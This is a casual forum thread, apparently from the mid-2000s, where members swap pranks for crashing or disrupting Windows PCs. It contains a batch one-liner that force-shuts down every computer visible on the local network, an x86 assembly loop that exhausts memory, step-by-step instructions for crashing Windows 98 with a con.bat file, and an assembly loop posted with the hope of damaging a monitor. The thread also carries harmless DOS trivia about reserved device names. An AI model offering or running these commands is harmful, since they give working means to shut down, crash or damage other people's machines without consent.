Member #4,589
May 2004

shutdown -s -f -c "Nelson: Haw haw!"

Batch files are fun.

Billybob
Member #3,136
January 2003

Quote:

Does anyone remember, there used to be a little snippet of HTML that would crash IE

used to? There's tons of stuff that crashes IE! Random chars usually do the trick after a couple iterations. A PHP script hat pumps out a string of random junk would work, just keep refreshing until it crashes.
At least, that's what I remember. There might be a need for tags, or something, but close enough.

thematrixeatsyou
Member #6,183
September 2005

Batch is fun but it's pretty crappy.
Unless (NT only):

for /f "tokens=1" %%a in ('net view') do if not "%%a"=="The" shutdown -s -t 60 -c "Have a nice day!" -m %%a

Shuts down all computers on the network that it can.

Oh, and BTW, what header has the Windows API? Use that for my app.

I was going to post a PureBasic example but I haven't used that in ages and I can't remember the Network system very well.

Anyways, here's a memory jammer in x86 ASM:

xor dx,dx
mov ss,dx
mov cx,ffff
mov sp,cx
SCRAMLOOP:
push cx
loop SCRAMLOOP
inc dx
mov ss,dx
mov cx,ffff
mov sp,cx
jmp SCRAMLOOP

Note that you need a good x86 compiler (not DEBUG) if you want to compile it as-is.
Also note that it jams itself up. Oops.

good food is t3h pwn <-- if anyone can find out how old this sig is they win an ascii penguin

OICW
Member #4,069
November 2003

The problem is that there's protection against it: open cmd and type "shutdown -a". So you have to set the time lower, but I'm not a bad boy ::)

[My website][CppReference][Pixelate][Allegators worldwide][Who's online]
"Final Fantasy XIV, I feel that anything I could say will be repeating myself, so I'm just gonna express my feelings with a strangled noise from the back of my throat. Graaarghhhh..." - Yahtzee
"Uhm... this is a.cc. Did you honestly think this thread WOULDN'T be derailed and ruined?" - BAF
"You can discuss it, you can dislike it, you can disagree with it, but that's all what you can do with it"

Peter Hull
Member #1,136
March 2001

William Heatley said:

used to? There's tons of stuff that crashes IE!

Yeah, but this was special.
link to story (2003)
I suppose it's fixed now.

Marcello - you only think we are assholes? I'd say we were bastards at least.

Pete

Marcello
Member #1,860
January 2002

Naw, bastards are cool. I'd say what you did only deserves a lowly title of asshole.

Marcello

tapir
Member #6,629
November 2005

go to your XP desktop and create a new folder then try to rename it to "con"
now, that's annoying :D

GullRaDriel
Member #3,861
September 2003

Tapir:
How is it possible ?
Any explanation ? I know that in french 'con' is a 'bad' word, but why by the hell cannot we name our directory as we want ?

"Code is like shit - it only smells if it is not yours"
Allegro Wiki, full of examples and articles !!

tapir
Member #6,629
November 2005

I read somwhere (probably a hoax ) that some ms programmers planted this kind of stuff for fun. I think it's a lie :) I don't have any other explanation :)

Onewing
Member #6,152
August 2005

Quote:

Any explanation ?

Not an easter egg.

------------
Solo-Games.org | My Tech Blog: The Digital Helm

Thomas Harte
Member #33
April 2000

Quote:

Any explanation ?

Con was a virtual file that sent its output to the console under DOS - and you know how Microsoft hate to actually write new code when 20 year old stuff still vaguely compiles. I'd dare bet that lpt and prn don't work either?

EDIT: And congratulations to Steven Silvey for pointing that out before I did! I was so proud of myself having remembered that vaguely obscure DOS fact for about 20 seconds there. Here's another: the Win9x/ME kernels allow the virtual devices to be opened by win32 programs, although via "openfile" rather than "fopen". It makes writing to the parallel port, through whatever driver the user may have installed, much easier than under NT/2000/XP.

tapir
Member #6,629
November 2005

prn doesn't work too :D

Onewing
Member #6,152
August 2005

Quote:

And congratulations to Steven Silvey for pointing that out before I did!

Three cheers for google. ;)

------------
Solo-Games.org | My Tech Blog: The Digital Helm

Arthur Kalliokoski
Second in Command
February 2005

I'd think that the matrix jammer code would cause a fault by stack wrapping past end of segment (cx = ffff so a word write would split ffff & 0)

They all watch too much MSNBC... they get ideas.

Marcello
Member #1,860
January 2002

aux doesn't work

thematrixeatsyou
Member #6,183
September 2005

Arthur: It's a LIFO (Last In First Out) buffer that goes backwards. It should go back to 0000h and then the app will reset SS:SP to (next segment):FFFFh.

Oh, and BTW, if you don't have the right patch:
1. Open MS-DOS Prompt. (It's patched in 98SE and 98 with Y2K bugfix)
2. Type in cd \windows\command. If you aren't in C: drive, type in c: first.
3. Now type in edit con.bat.
4. Type in echo hello, go to File->Save, and type in con.bat as a file name.
5. Save it, and watch your computer crash like it has never crashed before.

NB: Sometimes this crashes your PC badly. Other times it just gives you a standard Windows crash message.

Now, someone come back to HOME-MADE PROGRAMS...

good food is t3h pwn <-- if anyone can find out how old this sig is they win an ascii penguin

JonZ
Member #2,383
May 2002

I haven't spent that much time using assembly language but I'm pretty sure that the following code when compiled into an exe under DOS (maybe win95/win98/winMe) runs like this:

mov ax,13h
int 10          // switch to 320x200 (8bpp) mode

mov ax, 3h
int 10          // switch to text mode (80x25?)

repeat previous steps

Of course you have to add a while loop. I guess that since it switches so fast that it would fry some circuit on the monitor (I'm not an electronics expert by any chance).

Thanks for the correction :)

jhuuskon
Member #302
April 2000

not really. Just write it to a standard .com file (where the execution begins at byte 100) in debug.com and add a jmp 100.

You don't deserve my sig.

Dennis
Member #1,090
July 2003

Jonz said:

mov ax,13h
int 10 // switch to 320x240 (8bpp) mode

I think mode 13h has only 200 lines.

jhuuskon
Member #302
April 2000

yep. 320x200x8bit.